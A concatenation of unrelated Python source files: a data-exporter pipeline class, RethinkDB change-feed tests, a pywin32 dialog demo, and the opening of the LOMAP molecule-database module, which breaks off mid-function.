from exporters.readers.base_stream_reader import is_stream_reader
from six.moves.queue import Queue
from threading import Thread
import time
class BaseExporter(object):
def __init__(self, configuration):
self.config = ExporterConfig(configuration)
self.threaded = self.config.exporter_options.get('threaded', False)
self.queue_size = self.config.exporter_options.get('thread_queue_size', 100)
self.logger = ExportManagerLogger(self.config.log_options)
self.module_loader = ModuleLoader()
metadata = ExportMeta(configuration)
self.metadata = metadata
self.reader = self.module_loader.load_reader(
self.config.reader_options, metadata)
if is_stream_reader(self.reader):
deserializer = self.module_loader.load_deserializer(
self.config.deserializer_options, metadata)
decompressor = self.module_loader.load_decompressor(
self.config.decompressor_options, metadata)
self.reader.deserializer = deserializer
self.reader.decompressor = decompressor
self.filter_before = self.module_loader.load_filter(
self.config.filter_before_options, metadata)
self.filter_after = self.module_loader.load_filter(
self.config.filter_after_options, metadata)
self.transform = self.module_loader.load_transform(
self.config.transform_options, metadata)
self.export_formatter = self.module_loader.load_formatter(
self.config.formatter_options, metadata)
self.writer = self.module_loader.load_writer(
self.config.writer_options, metadata, export_formatter=self.export_formatter)
self.persistence = self.module_loader.load_persistence(
self.config.persistence_options, metadata)
self.grouper = self.module_loader.load_grouper(
self.config.grouper_options, metadata)
self.notifiers = NotifiersList(self.config.notifiers, metadata)
if self.config.disable_retries:
disable_retries()
self.logger.debug('{} has been initiated'.format(self.__class__.__name__))
self.stats_manager = self.module_loader.load_stats_manager(
self.config.stats_options, metadata)
self.bypass_cases = []
def _run_pipeline_iteration(self):
times = OrderedDict([('started', datetime.datetime.now())])
self.logger.debug('Getting new batch')
if self.config.exporter_options.get('forced_reads'):
next_batch = list(self.reader.get_next_batch())
else:
next_batch = self.reader.get_next_batch()
times.update(read=datetime.datetime.now())
next_batch = self.filter_before.filter_batch(next_batch)
times.update(filtered=datetime.datetime.now())
next_batch = self.transform.transform_batch(next_batch)
times.update(transformed=datetime.datetime.now())
next_batch = self.filter_after.filter_batch(next_batch)
times.update(filtered_after=datetime.datetime.now())
next_batch = self.grouper.group_batch(next_batch)
times.update(grouped=datetime.datetime.now())
try:
self.writer.write_batch(batch=next_batch)
times.update(written=datetime.datetime.now())
last_position = self._get_last_position()
self.persistence.commit_position(last_position)
times.update(persisted=datetime.datetime.now())
except ItemsLimitReached:
# we have written some amount of records up to the limit
times.update(written=datetime.datetime.now())
self._iteration_stats_report(times)
raise
else:
self._iteration_stats_report(times)
def _get_last_position(self):
last_position = self.reader.get_last_position()
last_position['writer_metadata'] = self.writer.get_all_metadata()
return last_position
def _init_export_job(self):
self.notifiers.notify_start_dump(receivers=[CLIENTS, TEAM])
last_position = self.persistence.get_last_position()
if last_position is not None:
self.writer.update_metadata(last_position.get('writer_metadata'))
self.metadata.accurate_items_count = last_position.get('accurate_items_count', False)
self.reader.set_last_position(last_position)
def _clean_export_job(self):
try:
self.reader.close()
except:
raise
finally:
self.writer.close()
def _finish_export_job(self):
self.writer.finish_writing()
self.metadata.end_time = datetime.datetime.now()
def bypass_exporter(self, bypass_class):
self.logger.info('Executing bypass {}.'.format(bypass_class.__name__))
self.notifiers.notify_start_dump(receivers=[CLIENTS, TEAM])
if not self.config.exporter_options.get('resume'):
self.persistence.close()
self.persistence.delete()
with closing(bypass_class(self.config, self.metadata)) as bypass:
bypass.execute()
if not bypass.valid_total_count:
self.metadata.accurate_items_count = False
self.logger.warning('No accurate items count info can be retrieved')
self.writer.set_metadata(
'items_count', self.writer.get_metadata('items_count') + bypass.total_items)
self.logger.info(
'Finished executing bypass {}.'.format(bypass_class.__name__))
self._final_stats_report()
self.notifiers.notify_complete_dump(receivers=[CLIENTS, TEAM])
def bypass(self):
if self.config.prevent_bypass:
return False
for bypass_class in self.bypass_cases:
if bypass_class.meets_conditions(self.config):
try:
self.bypass_exporter(bypass_class)
return True
finally:
self._clean_export_job()
return False
def _handle_export_exception(self, exception):
self.logger.error(traceback.format_exc(exception))
self.logger.error(str(exception))
self.notifiers.notify_failed_job(
str(exception), str(traceback.format_exc(exception)), receivers=[TEAM])
def _iteration_stats_report(self, times):
try:
self.stats_manager.iteration_report(times)
except Exception as e:
import traceback
traceback.print_exc()
self.logger.error('Error making stats report: {}'.format(str(e)))
def _final_stats_report(self):
try:
self.stats_manager.final_report()
except Exception as e:
self.logger.error('Error making final stats report: {}'.format(str(e)))
def _run_pipeline(self):
while not self.reader.is_finished():
try:
self._run_pipeline_iteration()
except ItemsLimitReached as e:
self.logger.info('{!r}'.format(e))
break
self.writer.flush()
def _reader_thread(self):
self.logger.info('Starting reader thread')
while not self.reader.is_finished():
self.process_queue.put(list(self.reader.get_next_batch()))
qsize = self.process_queue.qsize()
if qsize > 0.5*self.queue_size:
# Queues are getting full, throttle the reader so the processor/writer can keep up
time.sleep((qsize*10.0 / self.queue_size) - 5)
self.reader_finished = True
def _process_thread(self):
self.logger.info('Starting processing thread')
while not self.reader_finished or not self.process_queue.empty():
next_batch = self.process_queue.get()
next_batch = self.filter_before.filter_batch(next_batch)
next_batch = self.transform.transform_batch(next_batch)
next_batch = self.filter_after.filter_batch(next_batch)
next_batch = self.grouper.group_batch(next_batch)
self.writer_queue.put(next_batch)
self.process_finished = True
def _writer_thread(self):
self.logger.info('Starting writer thread')
while not self.process_finished or not self.writer_queue.empty():
batch = self.writer_queue.get()
self.writer.write_batch(batch=batch)
self.writer.finish_writing()
self.writer.flush()
def _run_threads(self):
self.reader_finished = False
self.process_finished = False
self.process_queue = Queue(self.queue_size)
self.writer_queue = Queue(self.queue_size)
reader_thread = Thread(target=self._reader_thread)
process_thread = Thread(target=self._process_thread)
writer_thread = Thread(target=self._writer_thread)
reader_thread.start()
process_thread.start()
writer_thread.start()
reader_thread.join()
process_thread.join()
writer_thread.join()
def export(self):
if not self.bypass():
try:
self._init_export_job()
if self.threaded:
self._run_threads()
else:
self._run_pipeline()
self._finish_export_job()
self._final_stats_report()
self.persistence.close()
self.notifiers.notify_complete_dump(receivers=[CLIENTS, TEAM])
except Exception as e:
self._handle_export_exception(e)
raise
finally:
self._clean_export_job()
else:
self.metadata.bypassed_pipeline = True
|
test_feed.py | """Test feed generator."""
import time
from queue import Queue
from threading import Thread
from typing import Optional
from unittest.case import TestCase
from rethinkmodel import config
from rethinkmodel.db import connect
from rethinkmodel.manage import manage
from rethinkmodel.model import Model
from tests.utils import clean
DB_NAME = "test_feed"
class FeededUser(Model):
"""A simple user."""
name: str
pointer: Optional[str]
clean(DB_NAME)
class FeedTest(TestCase):
"""Make some test on feed."""
def setUp(self) -> None:
"""Manage table."""
config(dbname=DB_NAME)
manage(__name__)
return super().setUp()
def test_feed_get(self):
"""Test to detect table change."""
first_call_name = "first"
second_call_name = "second"
queue = Queue()
def wait_for_changes():
feed = FeededUser.changes()
queue.put(True)
old, new = next(feed)
self.assertIsNone(old)
self.assertEqual(new.name, first_call_name)
queue.put(True)
old, new = next(feed)
self.assertEqual(old.name, first_call_name)
self.assertEqual(new.name, second_call_name)
thread = Thread(target=wait_for_changes)
thread.start()
# wait for thread to be ready
queue.get()
time.sleep(1)
# firs save
user = FeededUser(name=first_call_name).save()
# change name
queue.get()
time.sleep(1)
user.name = second_call_name
user.save()
# stop
thread.join()
def test_with_filter(self):
"""Test to get a feed with a filter."""
queue = Queue()
def filter_user():
feed = FeededUser.changes(select=lambda res: res["name"].eq("foo"))
queue.put(True)
# feed = FeededUser.changes()
old, new = next(feed)
self.assertIsNone(old)
if "foo" not in new.name:
self.fail(
f"The object should only contain 'foo' in name, get {new.name}"
)
thread = Thread(target=filter_user)
thread.start()
queue.get(True)
FeededUser(name="bar1").save() # fail if it's captured
FeededUser(name="foo").save() # should be ok
thread.join()
class FeedOnDeletedTest(TestCase):
"""Make test on deleted objects."""
def setUp(self) -> None:
"""Use soft deletion."""
config(dbname=DB_NAME, soft_delete=True)
return super().setUp()
def test_on_solft_deleted(self):
"""Make test on a deleted feeduser."""
queue = Queue()
def filter_user():
feed = FeededUser.changes(select=lambda res: res["name"].eq("foo"))
queue.put(True)
old, new = next(feed)
if "foo" not in new.name and new.pointer is not None:
self.fail(
f"The object should only contain 'foo' in name and "
f"pointer to None, get {new.name} and {new.pointer}"
)
# also try on old value, in case of...
if old and "foo" not in old.name and old.pointer is not None:
self.fail(
f"The object should only contain 'foo' in name and "
f"pointer to None, get {new.name} and {new.pointer}"
)
# the deleted user
user = FeededUser(name="bar").save()
kept = user.id
user.delete()
# prepare connection
rdb, conn = connect()
thread = Thread(target=filter_user)
thread.start()
# wait for thread to be ready
queue.get()
time.sleep(1)
# this will fail if the object is catched
rdb.table(FeededUser.tablename).get(kept).update(
{"name": "foo", "pointer": "changed"}
).run(conn)
# to close the thread
time.sleep(1)
FeededUser(name="foo").save()
thread.join()
conn.close()
|
win32gui_dialog.py | # A demo of a fairly complex dialog.
#
# Features:
# * Uses a "dynamic dialog resource" to build the dialog.
# * Uses a ListView control.
# * Dynamically resizes content.
# * Uses a second worker thread to fill the list.
# * Demostrates support for windows XP themes.
# If you are on Windows XP, and specify a '--noxp' argument, you will see:
# * alpha-blend issues with icons
# * The buttons are "old" style, rather than based on the XP theme.
# Hence, using:
# import winxpgui as win32gui
# is recommened.
# Please report any problems.
import sys
if "--noxp" in sys.argv:
import win32gui
else:
import winxpgui as win32gui
import win32api
import win32con, winerror
import struct, array
import commctrl
import Queue
import os
IDC_SEARCHTEXT = 1024
IDC_BUTTON_SEARCH = 1025
IDC_BUTTON_DISPLAY = 1026
IDC_LISTBOX = 1027
WM_SEARCH_RESULT = win32con.WM_USER + 512
WM_SEARCH_FINISHED = win32con.WM_USER + 513
class _WIN32MASKEDSTRUCT:
def __init__(self, **kw):
full_fmt = ""
for name, fmt, default, mask in self._struct_items_:
self.__dict__[name] = None
if fmt == "z":
full_fmt += "pi"
else:
full_fmt += fmt
for name, val in kw.iteritems():
if name not in self.__dict__:
raise ValueError("LVITEM structures do not have an item '%s'" % (name,))
self.__dict__[name] = val
def __setattr__(self, attr, val):
if not attr.startswith("_") and attr not in self.__dict__:
raise AttributeError(attr)
self.__dict__[attr] = val
def toparam(self):
self._buffs = []
full_fmt = ""
vals = []
mask = 0
# calc the mask
for name, fmt, default, this_mask in self._struct_items_:
if this_mask is not None and self.__dict__.get(name) is not None:
mask |= this_mask
self.mask = mask
for name, fmt, default, this_mask in self._struct_items_:
val = self.__dict__[name]
if fmt == "z":
fmt = "Pi"
if val is None:
vals.append(0)
vals.append(0)
else:
# Note this demo still works with byte strings. An
# alternate strategy would be to use unicode natively
# and use the 'W' version of the messages - eg,
# LVM_SETITEMW etc.
val = val + "\0"
if isinstance(val, unicode):
val = val.encode("mbcs")
str_buf = array.array("b", val)
vals.append(str_buf.buffer_info()[0])
vals.append(len(val))
self._buffs.append(str_buf) # keep alive during the call.
else:
if val is None:
val = default
vals.append(val)
full_fmt += fmt
return struct.pack(*(full_fmt,) + tuple(vals))
# NOTE: See the win32gui_struct module for an alternative way of dealing
# with these structures
class LVITEM(_WIN32MASKEDSTRUCT):
_struct_items_ = [
("mask", "I", 0, None),
("iItem", "i", 0, None),
("iSubItem", "i", 0, None),
("state", "I", 0, commctrl.LVIF_STATE),
("stateMask", "I", 0, None),
("text", "z", None, commctrl.LVIF_TEXT),
("iImage", "i", 0, commctrl.LVIF_IMAGE),
("lParam", "i", 0, commctrl.LVIF_PARAM),
("iIdent", "i", 0, None),
]
class LVCOLUMN(_WIN32MASKEDSTRUCT):
_struct_items_ = [
("mask", "I", 0, None),
("fmt", "i", 0, commctrl.LVCF_FMT),
("cx", "i", 0, commctrl.LVCF_WIDTH),
("text", "z", None, commctrl.LVCF_TEXT),
("iSubItem", "i", 0, commctrl.LVCF_SUBITEM),
("iImage", "i", 0, commctrl.LVCF_IMAGE),
("iOrder", "i", 0, commctrl.LVCF_ORDER),
]
class DemoWindowBase:
def __init__(self):
win32gui.InitCommonControls()
self.hinst = win32gui.dllhandle
self.list_data = {}
def _RegisterWndClass(self):
className = "PythonDocSearch"
message_map = {}
wc = win32gui.WNDCLASS()
wc.SetDialogProc() # Make it a dialog class.
wc.hInstance = self.hinst
wc.lpszClassName = className
wc.style = win32con.CS_VREDRAW | win32con.CS_HREDRAW
wc.hCursor = win32gui.LoadCursor( 0, win32con.IDC_ARROW )
wc.hbrBackground = win32con.COLOR_WINDOW + 1
wc.lpfnWndProc = message_map # could also specify a wndproc.
# C code: wc.cbWndExtra = DLGWINDOWEXTRA + sizeof(HBRUSH) + (sizeof(COLORREF));
wc.cbWndExtra = win32con.DLGWINDOWEXTRA + struct.calcsize("Pi")
icon_flags = win32con.LR_LOADFROMFILE | win32con.LR_DEFAULTSIZE
## py.ico went away in python 2.5, load from executable instead
this_app=win32api.GetModuleHandle(None)
try:
wc.hIcon=win32gui.LoadIcon(this_app, 1) ## python.exe and pythonw.exe
except win32gui.error:
wc.hIcon=win32gui.LoadIcon(this_app, 135) ## pythonwin's icon
try:
classAtom = win32gui.RegisterClass(wc)
except win32gui.error, err_info:
if err_info.winerror!=winerror.ERROR_CLASS_ALREADY_EXISTS:
raise
return className
def _GetDialogTemplate(self, dlgClassName):
style = win32con.WS_THICKFRAME | win32con.WS_POPUP | win32con.WS_VISIBLE | win32con.WS_CAPTION | win32con.WS_SYSMENU | win32con.DS_SETFONT | win32con.WS_MINIMIZEBOX
cs = win32con.WS_CHILD | win32con.WS_VISIBLE
title = "Dynamic Dialog Demo"
# Window frame and title
dlg = [ [title, (0, 0, 210, 250), style, None, (8, "MS Sans Serif"), None, dlgClassName], ]
# ID label and text box
dlg.append([130, "Enter something", -1, (5, 5, 200, 9), cs | win32con.SS_LEFT])
s = cs | win32con.WS_TABSTOP | win32con.WS_BORDER
dlg.append(['EDIT', None, IDC_SEARCHTEXT, (5, 15, 200, 12), s])
# Search/Display Buttons
# (x positions don't matter here)
s = cs | win32con.WS_TABSTOP
dlg.append([128, "Fill List", IDC_BUTTON_SEARCH, (5, 35, 50, 14), s | win32con.BS_DEFPUSHBUTTON])
s = win32con.BS_PUSHBUTTON | s
dlg.append([128, "Display", IDC_BUTTON_DISPLAY, (100, 35, 50, 14), s])
# List control.
# Can't make this work :(
## s = cs | win32con.WS_TABSTOP
## dlg.append(['SysListView32', "Title", IDC_LISTBOX, (5, 505, 200, 200), s])
return dlg
def _DoCreate(self, fn):
message_map = {
win32con.WM_SIZE: self.OnSize,
win32con.WM_COMMAND: self.OnCommand,
win32con.WM_NOTIFY: self.OnNotify,
win32con.WM_INITDIALOG: self.OnInitDialog,
win32con.WM_CLOSE: self.OnClose,
win32con.WM_DESTROY: self.OnDestroy,
WM_SEARCH_RESULT: self.OnSearchResult,
WM_SEARCH_FINISHED: self.OnSearchFinished,
}
dlgClassName = self._RegisterWndClass()
template = self._GetDialogTemplate(dlgClassName)
return fn(self.hinst, template, 0, message_map)
def _SetupList(self):
child_style = win32con.WS_CHILD | win32con.WS_VISIBLE | win32con.WS_BORDER | win32con.WS_HSCROLL | win32con.WS_VSCROLL
child_style |= commctrl.LVS_SINGLESEL | commctrl.LVS_SHOWSELALWAYS | commctrl.LVS_REPORT
self.hwndList = win32gui.CreateWindow("SysListView32", None, child_style, 0, 0, 100, 100, self.hwnd, IDC_LISTBOX, self.hinst, None)
child_ex_style = win32gui.SendMessage(self.hwndList, commctrl.LVM_GETEXTENDEDLISTVIEWSTYLE, 0, 0)
child_ex_style |= commctrl.LVS_EX_FULLROWSELECT
win32gui.SendMessage(self.hwndList, commctrl.LVM_SETEXTENDEDLISTVIEWSTYLE, 0, child_ex_style)
# Add an image list - use the builtin shell folder icon - this
# demonstrates the problem with alpha-blending of icons on XP if
# winxpgui is not used in place of win32gui.
il = win32gui.ImageList_Create(
win32api.GetSystemMetrics(win32con.SM_CXSMICON),
win32api.GetSystemMetrics(win32con.SM_CYSMICON),
commctrl.ILC_COLOR32 | commctrl.ILC_MASK,
1, # initial size
0) # cGrow
shell_dll = os.path.join(win32api.GetSystemDirectory(), "shell32.dll")
large, small = win32gui.ExtractIconEx(shell_dll, 4, 1)
win32gui.ImageList_ReplaceIcon(il, -1, small[0])
win32gui.DestroyIcon(small[0])
win32gui.DestroyIcon(large[0])
win32gui.SendMessage(self.hwndList, commctrl.LVM_SETIMAGELIST,
commctrl.LVSIL_SMALL, il)
# Setup the list control columns.
lvc = LVCOLUMN(mask = commctrl.LVCF_FMT | commctrl.LVCF_WIDTH | commctrl.LVCF_TEXT | commctrl.LVCF_SUBITEM)
lvc.fmt = commctrl.LVCFMT_LEFT
lvc.iSubItem = 1
lvc.text = "Title"
lvc.cx = 200
win32gui.SendMessage(self.hwndList, commctrl.LVM_INSERTCOLUMN, 0, lvc.toparam())
lvc.iSubItem = 0
lvc.text = "Order"
lvc.cx = 50
win32gui.SendMessage(self.hwndList, commctrl.LVM_INSERTCOLUMN, 0, lvc.toparam())
win32gui.UpdateWindow(self.hwnd)
def ClearListItems(self):
win32gui.SendMessage(self.hwndList, commctrl.LVM_DELETEALLITEMS)
self.list_data = {}
def AddListItem(self, data, *columns):
num_items = win32gui.SendMessage(self.hwndList, commctrl.LVM_GETITEMCOUNT)
item = LVITEM(text=columns[0], iItem = num_items)
new_index = win32gui.SendMessage(self.hwndList, commctrl.LVM_INSERTITEM, 0, item.toparam())
col_no = 1
for col in columns[1:]:
item = LVITEM(text=col, iItem = new_index, iSubItem = col_no)
win32gui.SendMessage(self.hwndList, commctrl.LVM_SETITEM, 0, item.toparam())
col_no += 1
self.list_data[new_index] = data
def OnInitDialog(self, hwnd, msg, wparam, lparam):
self.hwnd = hwnd
# centre the dialog
desktop = win32gui.GetDesktopWindow()
l,t,r,b = win32gui.GetWindowRect(self.hwnd)
dt_l, dt_t, dt_r, dt_b = win32gui.GetWindowRect(desktop)
centre_x, centre_y = win32gui.ClientToScreen( desktop, ( (dt_r-dt_l)//2, (dt_b-dt_t)//2) )
win32gui.MoveWindow(hwnd, centre_x-(r//2), centre_y-(b//2), r-l, b-t, 0)
self._SetupList()
l,t,r,b = win32gui.GetClientRect(self.hwnd)
self._DoSize(r-l,b-t, 1)
def _DoSize(self, cx, cy, repaint = 1):
# right-justify the textbox.
ctrl = win32gui.GetDlgItem(self.hwnd, IDC_SEARCHTEXT)
l, t, r, b = win32gui.GetWindowRect(ctrl)
l, t = win32gui.ScreenToClient(self.hwnd, (l,t) )
r, b = win32gui.ScreenToClient(self.hwnd, (r,b) )
win32gui.MoveWindow(ctrl, l, t, cx-l-5, b-t, repaint)
# The button.
ctrl = win32gui.GetDlgItem(self.hwnd, IDC_BUTTON_DISPLAY)
l, t, r, b = win32gui.GetWindowRect(ctrl)
l, t = win32gui.ScreenToClient(self.hwnd, (l,t) )
r, b = win32gui.ScreenToClient(self.hwnd, (r,b) )
list_y = b + 10
w = r - l
win32gui.MoveWindow(ctrl, cx - 5 - w, t, w, b-t, repaint)
# The list control
win32gui.MoveWindow(self.hwndList, 0, list_y, cx, cy-list_y, repaint)
# The last column of the list control.
new_width = cx - win32gui.SendMessage(self.hwndList, commctrl.LVM_GETCOLUMNWIDTH, 0)
win32gui.SendMessage(self.hwndList, commctrl.LVM_SETCOLUMNWIDTH, 1, new_width)
def OnSize(self, hwnd, msg, wparam, lparam):
x = win32api.LOWORD(lparam)
y = win32api.HIWORD(lparam)
self._DoSize(x,y)
return 1
def OnSearchResult(self, hwnd, msg, wparam, lparam):
try:
while 1:
params = self.result_queue.get(0)
self.AddListItem(*params)
except Queue.Empty:
pass
def OnSearchFinished(self, hwnd, msg, wparam, lparam):
print "OnSearchFinished"
def OnNotify(self, hwnd, msg, wparam, lparam):
format = "PPiiiiiiiiP"
buf = win32gui.PyMakeBuffer(struct.calcsize(format), lparam)
hwndFrom, idFrom, code, iItem, iSubItem, uNewState, uOldState, uChanged, actionx, actiony, lParam \
= struct.unpack(format, buf)
if code == commctrl.NM_DBLCLK:
print "Double click on item", iItem+1
return 1
def OnCommand(self, hwnd, msg, wparam, lparam):
id = win32api.LOWORD(wparam)
if id == IDC_BUTTON_SEARCH:
self.ClearListItems()
def fill_slowly(q, hwnd):
import time
for i in range(20):
q.put(("whatever", str(i+1), "Search result " + str(i) ))
win32gui.PostMessage(hwnd, WM_SEARCH_RESULT, 0, 0)
time.sleep(.25)
win32gui.PostMessage(hwnd, WM_SEARCH_FINISHED, 0, 0)
import threading
self.result_queue = Queue.Queue()
thread = threading.Thread(target = fill_slowly, args=(self.result_queue, self.hwnd) )
thread.start()
elif id == IDC_BUTTON_DISPLAY:
print "Display button selected"
sel = win32gui.SendMessage(self.hwndList, commctrl.LVM_GETNEXTITEM, -1, commctrl.LVNI_SELECTED)
print "The selected item is", sel+1
# These function differ based on how the window is used, so may be overridden
def OnClose(self, hwnd, msg, wparam, lparam):
raise NotImplementedError
def OnDestroy(self, hwnd, msg, wparam, lparam):
pass
# An implementation suitable for use with the Win32 Window functions (ie, not
# a true dialog)
class DemoWindow(DemoWindowBase):
def CreateWindow(self):
# Create the window via CreateDialogBoxIndirect - it can then
# work as a "normal" window, once a message loop is established.
self._DoCreate(win32gui.CreateDialogIndirect)
def OnClose(self, hwnd, msg, wparam, lparam):
win32gui.DestroyWindow(hwnd)
# We need to arrange to a WM_QUIT message to be sent to our
# PumpMessages() loop.
def OnDestroy(self, hwnd, msg, wparam, lparam):
win32gui.PostQuitMessage(0) # Terminate the app.
# An implementation suitable for use with the Win32 Dialog functions.
class DemoDialog(DemoWindowBase):
def DoModal(self):
return self._DoCreate(win32gui.DialogBoxIndirect)
def OnClose(self, hwnd, msg, wparam, lparam):
win32gui.EndDialog(hwnd, 0)
def DemoModal():
w=DemoDialog()
w.DoModal()
def DemoCreateWindow():
w=DemoWindow()
w.CreateWindow()
# PumpMessages runs until PostQuitMessage() is called by someone.
win32gui.PumpMessages()
if __name__=='__main__':
DemoModal()
DemoCreateWindow()
|
dbmol.py | #******************
# MODULE DOCSTRING
#******************
"""
LOMAP
=====
Alchemical free energy calculations hold increasing promise as an aid to drug
discovery efforts. However, applications of these techniques in discovery
projects have been relatively few, partly because of the difficulty of planning
and setting up calculations. The Lead Optimization Mapper (LOMAP) is an
automated algorithm to plan efficient relative free energy calculations between
potential ligands within a substantial of compounds.
"""
#*****************************************************************************
# Lomap2: A toolkit to plan alchemical relative binding affinity calculations
# Copyright 2015 - 2016 UC Irvine and the Authors
#
# Authors: Dr Gaetano Calabro' and Dr David Mobley
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, see http://www.gnu.org/licenses/
#*****************************************************************************
#****************
# MODULE IMPORTS
#****************
from rdkit import Chem
import numpy as np
from lomap import mcs
from lomap import fp
from lomap import graphgen
import sys,os
import math
import multiprocessing
import networkx as nx
import logging
import glob
import argparse
import pickle
from rdkit import DataStructs
from rdkit.Chem.Fingerprints import FingerprintMols
__all__ = ['DBMolecules', 'SMatrix', 'Molecule']
#*************************
# Molecule Database Class
#*************************
class DBMolecules(object):
"""
This class is used as a container for all the Molecules
"""
# Initialization function
def __init__(self, directory, parallel=1, verbose='off',
time=20, ecrscore=0.0, output=False,
name='out', display=False,
max=6, cutoff=0.4, radial=False, hub=None, fingerprint=False, fast=False):
"""
Initialization of the Molecule Database Class
Parameters
----------
directory : str
the mol2 directory file name
parallel : int
the number of cores used to generate the similarity score matrices
verbose : bool
verbose mode
time : int
the maximum time in seconds used to perform the MCS search
ecrscore: float
the electrostatic score to be used (if != 0) if two molecule have diffrent charges
output : bool
a flag used to generate or not the output files
name : str
the file name prefix used to produce the output files
display : bool
a flag used to display or not a network made by using matplotlib
max : int
the maximum distance used to cluster the graph nodes
cutoff : float
the Minimum Similarity Score (MSS) used to build the graph
"""
# Set the Logging
if verbose == 'off':
logging.basicConfig(format='%(message)s', level=logging.CRITICAL)
if verbose == 'info':
logging.basicConfig(format='%(message)s', level=logging.INFO)
if verbose == 'pedantic':
logging.basicConfig(format='%(message)s', level=logging.DEBUG)
#logging.basicConfig(format='%(levelname)s:\t%(message)s', level=logging.DEBUG)
if __name__ == '__main__':
self.options = parser.parse_args()
else:
if not isinstance(output, bool):
raise TypeError('The output flag is not a bool type')
if not isinstance(display, bool):
raise TypeError('The display flag is not a bool type')
if not isinstance(radial, bool):
raise TypeError('The radial flag is not a bool type')
output_str=''
display_str=''
radial_str=''
fingerprint_str=''
fast_str=''
parser.set_defaults(output=output)
parser.set_defaults(display=display)
parser.set_defaults(radial=radial)
parser.set_defaults(fingerprint=fingerprint)
parser.set_defaults(fast=fast)
if output:
output_str='--output'
if display:
display_str='--display'
if radial:
radial_str='--radial'
if fingerprint:
fingerprint_str='--fingerprint'
if fast:
fast_str = '--fast'
names_str = '%s --parallel %s --verbose %s --time %s --ecrscore %s --name %s --max %s --cutoff %s --hub %s %s %s %s %s %s'\
% (directory, parallel, verbose, time, ecrscore, name, max, cutoff, hub, output_str, display_str, radial_str, fingerprint_str, fast_str)
self.options = parser.parse_args(names_str.split())
# Internal list container used to store the loaded molecule objects
self.__list = self.read_mol2_files()
# Dictionary which holds the mapping between the generated molecule IDs and molecule file names
self.dic_mapping = {}
for mol in self.__list:
self.dic_mapping[mol.getID()]=mol.getName()
# Index used to perform index selection by using __iter__ function
self.__ci = 0
# Symmetric matrices used to store the mcs scoring. The matrices are subclasses of numpy
self.strict_mtx = SMatrix(shape=(0,))
self.loose_mtx = SMatrix(shape=(0,))
# Empty pointer to the networkx graph
self.Graph = nx.Graph()
def __iter__(self):
"""
Index generator
"""
return self
def next(self): # Python 3: def __next__(self)
"""
Select the molecule during an iteration
"""
if self.__ci > len(self.__list) - 1:
self.__ci = 0
raise StopIteration
else:
self.__ci = self.__ci + 1
return self.__list[self.__ci - 1]
def __getitem__(self, index):
"""
Slicing and index selection function
"""
return self.__list[index]
def __setitem__(self, index, molecule):
"""
Index setting function
Parameters
----------
index : int
the molecule index
molecule : Molecule obj
the molecule to assign to the molecule database by selecting the index:
DB[index] = molecule
"""
if not isinstance(molecule, Molecule):
raise ValueError('The passed molecule is not a Molecule object')
self.__list[index] = molecule
def __add__(self, molecule):
"""
Add a new molecule to the molecule database
Parameters
----------
molecule : Molecule obj
the molecule to append into the molecule database
"""
if not isinstance(molecule, Molecule):
raise ValueError('The passed molecule is not a Molecule object')
self.__list.append(molecule)
def nums(self):
"""
This function recovers the total number of molecules currently stored in
the molecule database
"""
return len(self.__list)
def read_mol2_files(self):
"""
Read in all the mol2 files
Returns
-------
molid_list : list of Molecule objects
the container list of all the allocated Molecule objects
"""
# This list is used as container to handle all the molecules read in by using RdKit.
# All the molecules are instances of Molecule class
molid_list = []
# List of molecule that failed to load in
mol_error_list_fn = []
logging.info(30*'-')
# The .mol2 file format is the only supported so far
mol_fnames = glob.glob(self.options.directory + "/*.mol2" )
mol_fnames.sort()
if (len( mol_fnames ) < 2) :
raise IOError('The directory %s must contain at least two mol2 files' % self.options.directory)
print_cnt = 0
mol_id_cnt = 0
for fname in mol_fnames :
# The RDkit molecule object reads in as mol2 file. The molecule is not sanitized and
# all the hydrogens are kept in place
rdkit_mol = Chem.MolFromMol2File(fname, sanitize=False, removeHs=False)
# Reading problems
if rdkit_mol == None:
logging.warning('Error reading the file: %s' % os.path.basename(fname))
mol_error_list_fn.append(os.path.basename(fname))
continue
# The Rdkit molecule is stored in a Molecule object
mol = Molecule(rdkit_mol, mol_id_cnt ,os.path.basename(fname))
mol_id_cnt +=1
# Cosmetic printing and status
if print_cnt < 15 or print_cnt == (len(mol_fnames) - 1):
logging.info('ID %s\t%s' % (mol.getID(), os.path.basename(fname)))
if print_cnt == 15:
logging.info('ID %s\t%s' % (mol.getID(), os.path.basename(fname)))
logging.info(3*'\t.\t.\n')
print_cnt+= 1
molid_list.append(mol)
logging.info(30*'-')
logging.info('Finish reading input files. %d structures in total....skipped %d\n' % (len(molid_list), len(mol_error_list_fn)))
if mol_error_list_fn:
logging.warning('Skipped molecules:')
logging.warning(30*'-')
for fn in mol_error_list_fn:
logging.warning('%s'% fn)
print(30*'-')
return molid_list
def compute_mtx(self, a, b, strict_mtx, loose_mtx, ecr_mtx, fingerprint = False):
"""
Compute a chunk of the similariry score matrices. The chunk is selected
by the start index a and the final index b. The matrices are indeed
treated as linear array
Parameters
----------
a : int
the start index of the chunk
b : int
the final index of the chunk
strict_mtx: python multiprocessing array
srict simimarity score matrix. This array is used as shared memory
array managed by the different allocated processes. Each process
operates on a separate chunk selected by the indexes a and b
loose_mtx: python multiprocessing array
loose similarity score matrix. This array is used as shared memory
array managed by the different allocated processes. Each process
operates on a separate chunk selected by the indexes a and b
ecr_mtx: python multiprocessing array
EleCtrostatic Rule (ECR) score matrix. This array is used as shared memory
array managed by the different allocated processes. Each process
operates on a separate chunk selected by the indexes a and b
fingerprint: boolean
using the structural fingerprint as the similarity matrix,
not suggested option but currently runs faster than mcss based similarity
"""
# name = multiprocessing.current_process().name
# print name
# print 'a = %d, b = %d' % (a,b)
# print '\n'
def ecr(mol_i, mol_j):
"""
This function computes the similariry score between the passed molecules
by using the EleCtrostatic Rule (ECR)
Parameters
----------
mol_i : Rdkit molecule object
the first molecules used to calculate the ECR rule
mol_j : Rdkit molecule object
the second molecules used to calculate the ECR rule
Returns
-------
scr_ecr: float
the calculated similarity score (1 if mol_i and mol_j have the
same total charges, 0 otherwire)
"""
total_charge_mol_i = 0.0
for atom in mol_i.GetAtoms():
total_charge_mol_i += float(atom.GetProp('_TriposPartialCharge'))
total_charge_mol_j = 0.0
